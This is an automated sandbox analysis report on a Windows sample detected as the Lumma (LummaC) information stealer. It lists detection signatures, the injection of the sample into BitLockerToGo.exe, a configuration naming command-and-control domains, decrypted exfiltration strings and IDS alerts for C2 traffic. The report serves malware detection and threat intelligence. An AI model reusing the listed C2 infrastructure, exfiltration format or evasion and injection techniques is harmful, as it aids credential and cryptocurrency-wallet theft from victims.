Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
64pOGv7k4N.exe

Overview

General Information

Sample name:64pOGv7k4N.exe
renamed because original name is a hash value
Original sample name:a56fc11692ab8baf7f9e3b80540d63c5.exe
Analysis ID:1585289
MD5:a56fc11692ab8baf7f9e3b80540d63c5
SHA1:4ddd8e40b3ca6c4cd0cf4156b5b163074065a79c
SHA256:0bcd82ed4ea3e12cbaabc50df612d48078604e4d0985e9a240afc24630afa4d7
Tags:exeuser-abuse_ch
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 64pOGv7k4N.exe (PID: 7612 cmdline: "C:\Users\user\Desktop\64pOGv7k4N.exe" MD5: A56FC11692AB8BAF7F9E3B80540D63C5)
    • BitLockerToGo.exe (PID: 7912 cmdline: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" MD5: A64BEAB5D4516BECA4C40B25DC0C1CD8)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["abruptyopsn.shop", "rabidcowse.shop", "noisycuttej.shop", "wholersorie.shop", "cloudewahsj.shop", "tirepublicerj.shop", "framekgirus.shop", "mooncobudy.click", "nearycrepso.shop"], "Build id": "Jwquln--3112YT"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000000.00000002.1648435573.0000000011780000.00000004.00001000.00020000.00000000.sdmpMsfpayloads_msf_9Metasploit Payloads - file msf.war - contentsFlorian Roth
      • 0x0:$x1: 4d5a9000030000000
      00000003.00000003.1725784713.0000000003326000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Process Memory Space: BitLockerToGo.exe PID: 7912JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: BitLockerToGo.exe PID: 7912JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
            decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

              Sigma Signatures

              No Sigma rule has matched

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-07T13:19:35.825750+010020283713Unknown Traffic192.168.2.349913188.114.97.3443TCP
              2025-01-07T13:19:37.138527+010020283713Unknown Traffic192.168.2.349919188.114.97.3443TCP
              2025-01-07T13:19:38.728022+010020283713Unknown Traffic192.168.2.349930188.114.97.3443TCP
              2025-01-07T13:19:40.827989+010020283713Unknown Traffic192.168.2.349944188.114.97.3443TCP
              2025-01-07T13:19:42.154407+010020283713Unknown Traffic192.168.2.349951188.114.97.3443TCP
              2025-01-07T13:19:43.789033+010020283713Unknown Traffic192.168.2.349963188.114.97.3443TCP
              2025-01-07T13:19:45.302126+010020283713Unknown Traffic192.168.2.349973188.114.97.3443TCP
              2025-01-07T13:19:47.239277+010020283713Unknown Traffic192.168.2.349983188.114.97.3443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-07T13:19:36.324777+010020546531A Network Trojan was detected192.168.2.349913188.114.97.3443TCP
              2025-01-07T13:19:37.895782+010020546531A Network Trojan was detected192.168.2.349919188.114.97.3443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-07T13:19:36.324777+010020498361A Network Trojan was detected192.168.2.349913188.114.97.3443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-07T13:19:37.895782+010020498121A Network Trojan was detected192.168.2.349919188.114.97.3443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-07T13:19:35.825750+010020587161Domain Observed Used for C2 Detected192.168.2.349913188.114.97.3443TCP
              2025-01-07T13:19:37.138527+010020587161Domain Observed Used for C2 Detected192.168.2.349919188.114.97.3443TCP
              2025-01-07T13:19:38.728022+010020587161Domain Observed Used for C2 Detected192.168.2.349930188.114.97.3443TCP
              2025-01-07T13:19:40.827989+010020587161Domain Observed Used for C2 Detected192.168.2.349944188.114.97.3443TCP
              2025-01-07T13:19:42.154407+010020587161Domain Observed Used for C2 Detected192.168.2.349951188.114.97.3443TCP
              2025-01-07T13:19:43.789033+010020587161Domain Observed Used for C2 Detected192.168.2.349963188.114.97.3443TCP
              2025-01-07T13:19:45.302126+010020587161Domain Observed Used for C2 Detected192.168.2.349973188.114.97.3443TCP
              2025-01-07T13:19:47.239277+010020587161Domain Observed Used for C2 Detected192.168.2.349983188.114.97.3443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-07T13:19:35.249464+010020587151Domain Observed Used for C2 Detected192.168.2.3531841.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-07T13:19:41.479046+010020480941Malware Command and Control Activity Detected192.168.2.349944188.114.97.3443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-07T13:19:45.306719+010028438641A Network Trojan was detected192.168.2.349973188.114.97.3443TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus / Scanner detection for submitted sample
              Source: 64pOGv7k4N.exeAvira: detected
              Antivirus detection for URL or domain
              Source: mooncobudy.clickAvira URL Cloud: Label: malware
              Source: https://mooncobudy.click/d&Avira URL Cloud: Label: malware
              Source: https://mooncobudy.click:443/apiv1np.default-release/key4.dbPKAvira URL Cloud: Label: malware
              Source: https://mooncobudy.click/Avira URL Cloud: Label: malware
              Source: https://mooncobudy.click:443/apiMAvira URL Cloud: Label: malware
              Source: https://mooncobudy.click/apijYcAvira URL Cloud: Label: malware
              Source: https://mooncobudy.click:443/apiAvira URL Cloud: Label: malware
              Source: https://mooncobudy.click/apiAvira URL Cloud: Label: malware
              Source: https://mooncobudy.click/4%G##Avira URL Cloud: Label: malware
              Found malware configuration
              Source: 3.2.BitLockerToGo.exe.400000.0.unpackMalware Configuration Extractor: LummaC {"C2 url": ["abruptyopsn.shop", "rabidcowse.shop", "noisycuttej.shop", "wholersorie.shop", "cloudewahsj.shop", "tirepublicerj.shop", "framekgirus.shop", "mooncobudy.click", "nearycrepso.shop"], "Build id": "Jwquln--3112YT"}
              Multi AV Scanner detection for submitted file
              Source: 64pOGv7k4N.exeReversingLabs: Detection: 73%
              Source: 64pOGv7k4N.exeVirustotal: Detection: 72%Perma Link
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
              Machine Learning detection for sample
              Source: 64pOGv7k4N.exeJoe Sandbox ML: detected
              Sample uses string decryption to hide its real strings
              Source: 00000000.00000002.1646937070.0000000011533000.00000004.00001000.00020000.00000000.sdmpString decryptor: cloudewahsj.shop
              Source: 00000000.00000002.1646937070.0000000011533000.00000004.00001000.00020000.00000000.sdmpString decryptor: rabidcowse.shop
              Source: 00000000.00000002.1646937070.0000000011533000.00000004.00001000.00020000.00000000.sdmpString decryptor: noisycuttej.shop
              Source: 00000000.00000002.1646937070.0000000011533000.00000004.00001000.00020000.00000000.sdmpString decryptor: tirepublicerj.shop
              Source: 00000000.00000002.1646937070.0000000011533000.00000004.00001000.00020000.00000000.sdmpString decryptor: framekgirus.shop
              Source: 00000000.00000002.1646937070.0000000011533000.00000004.00001000.00020000.00000000.sdmpString decryptor: wholersorie.shop
              Source: 00000000.00000002.1646937070.0000000011533000.00000004.00001000.00020000.00000000.sdmpString decryptor: abruptyopsn.shop
              Source: 00000000.00000002.1646937070.0000000011533000.00000004.00001000.00020000.00000000.sdmpString decryptor: nearycrepso.shop
              Source: 00000000.00000002.1646937070.0000000011533000.00000004.00001000.00020000.00000000.sdmpString decryptor: mooncobudy.click
              Source: 00000000.00000002.1646937070.0000000011533000.00000004.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
              Source: 00000000.00000002.1646937070.0000000011533000.00000004.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
              Source: 00000000.00000002.1646937070.0000000011533000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
              Source: 00000000.00000002.1646937070.0000000011533000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
              Source: 00000000.00000002.1646937070.0000000011533000.00000004.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
              Source: 00000000.00000002.1646937070.0000000011533000.00000004.00001000.00020000.00000000.sdmpString decryptor: Jwquln--3112YT
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00419362 CryptUnprotectData,3_2_00419362
              Source: 64pOGv7k4N.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DEBUG_STRIPPED
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.3:49913 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.3:49919 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.3:49930 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.3:49944 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.3:49951 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.3:49963 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.3:49973 version: TLS 1.2
              Source: 64pOGv7k4N.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: Binary string: BitLockerToGo.pdb source: 64pOGv7k4N.exe, 00000000.00000002.1648435573.00000000118FC000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: BitLockerToGo.pdbGCTL source: 64pOGv7k4N.exe, 00000000.00000002.1648435573.00000000118FC000.00000004.00001000.00020000.00000000.sdmp
              Source: C:\Users\user\Desktop\64pOGv7k4N.exeCode function: 4x nop then mov ebp, ebx0_2_00AD6C20
              Source: C:\Users\user\Desktop\64pOGv7k4N.exeCode function: 4x nop then mov ecx, eax0_2_00AD7F00
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+217F4C11h]3_2_00426000
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ebx, byte ptr [eax+edx-143BF0FEh]3_2_0040C22D
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov dword ptr [esp], ecx3_2_00419362
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 9164D103h3_2_0043FB80
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx+2397B827h]3_2_0043DCE9
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h3_2_0043DCE9
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [ebp+esi*8+00h], 56ADC53Ah3_2_00440480
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov esi, edx3_2_00408640
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [edi], al3_2_0042BE8A
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx eax, byte ptr [esp+ecx-1EBCBB22h]3_2_0042BE8A
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp byte ptr [esi+eax], 00000000h3_2_0042A050
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+129161F8h]3_2_0043E051
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edx, byte ptr [ebx+eax-01h]3_2_0043E850
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp ecx3_2_0043D818
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 798ECF08h3_2_00419820
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h3_2_00419820
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [ebp+10h]3_2_0043F830
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [ebp+10h]3_2_0043F0CB
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [edi], dl3_2_0042C0CD
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+18h]3_2_00415882
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 138629C0h3_2_00415882
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], 385488F2h3_2_004398A0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 4B1BF3DAh3_2_004390A0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [edi], dl3_2_0042C140
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [eax+ebx*8], 9EB5184Bh3_2_00416148
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+68h]3_2_00416148
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [esi], al3_2_00416148
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [esi], al3_2_00416148
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [edi], cx3_2_0042895A
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ecx, eax3_2_0042895A
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx esi, word ptr [eax]3_2_00424974
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 385488F2h3_2_00424974
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [eax], cx3_2_00428100
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], E81D91D4h3_2_00440130
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp ecx3_2_004229CD
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [eax], cx3_2_004229CD
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h3_2_0043E19A
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [edi], dl3_2_0042C1A3
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-27C0856Fh]3_2_0043C1B0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [ebp+10h]3_2_0043F1B0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [eax], cx3_2_00427A5A
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [edi], ax3_2_0041CA60
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [edi], ax3_2_0041CA60
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-19559D57h]3_2_0043E262
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+000011E4h]3_2_00423A60
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [edi], al3_2_0042C26C
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx eax, byte ptr [esp+ecx-1EBCBB22h]3_2_0042C26C
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [esi], al3_2_0042BA79
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [ebp+10h]3_2_0043F2F6
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [edi], al3_2_0042C282
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx eax, byte ptr [esp+ecx-1EBCBB22h]3_2_0042C282
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-22E2F54Ah]3_2_0043EA80
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]3_2_00429A90
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [eax], cx3_2_00426340
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+217F4C99h]3_2_00426340
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edi, byte ptr [ecx+esi]3_2_00402B60
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-00000092h]3_2_00426360
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [eax], cx3_2_00426360
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [eax], cx3_2_00427B08
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [ebp+10h]3_2_0043F330
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+20h]3_2_004073C0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ecx, word ptr [ebp+edi*4+00h]3_2_004073C0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [ebp+10h]3_2_0043F3C0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edx, byte ptr [ebx+ecx-5Fh]3_2_0041C3CC
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then push esi3_2_00420BD3
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then test eax, eax3_2_004393D0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [eax], dl3_2_0042238D
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp ecx3_2_0042238D
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov edx, eax3_2_0043C440
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [ebp+10h]3_2_0043F450
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ebx, byte ptr [esp+edi-4Bh]3_2_00439C70
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ebx, byte ptr [edx]3_2_00435410
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+02h]3_2_00421C80
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ebx, byte ptr [esp+ecx+5BA4F399h]3_2_00416C90
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp byte ptr [esi+eax], 00000000h3_2_004274A5
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx eax, byte ptr [ebp+ecx-000000DCh]3_2_00427CB0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [eax], cx3_2_00427CB0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov esi, ecx3_2_0043C510
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then test eax, eax3_2_0043C510
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 06702B10h3_2_0043C510
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ebx, byte ptr [esp+eax+5024FCA5h]3_2_00414DC0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ebx, byte ptr [esp+ecx+5BA4F399h]3_2_00416C90
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+18h]3_2_004155DB
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ecx, eax3_2_0041AD80
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 2DFE5A91h3_2_0043FE20
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [ecx], bp3_2_0041CECA
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ebx, byte ptr [esp+ecx]3_2_0043E6E0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ebx, byte ptr [esp+ecx+000000C8h]3_2_0040C6F0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [edi], bl3_2_00408EF0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [ebp+00h], al3_2_0041DE90
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [ebx], cx3_2_00418740
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [edi], dx3_2_00414777
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [esi], al3_2_0041BFCA
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+20h]3_2_004237D0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+5F376B7Fh]3_2_00417FE1
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax+000002E8h]3_2_00417FE1
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [esi], al3_2_00416F8D
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov edx, ecx3_2_00416F8D
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [esi], cx3_2_00416F8D
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp+20h]3_2_00424F91
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 385488F2h3_2_00424F91
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax]3_2_0043DFB3

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2058715 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mooncobudy .click) : 192.168.2.3:53184 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2058716 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (mooncobudy .click in TLS SNI) : 192.168.2.3:49913 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2058716 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (mooncobudy .click in TLS SNI) : 192.168.2.3:49944 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2058716 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (mooncobudy .click in TLS SNI) : 192.168.2.3:49919 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2058716 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (mooncobudy .click in TLS SNI) : 192.168.2.3:49930 -> 188.114.97.3:443
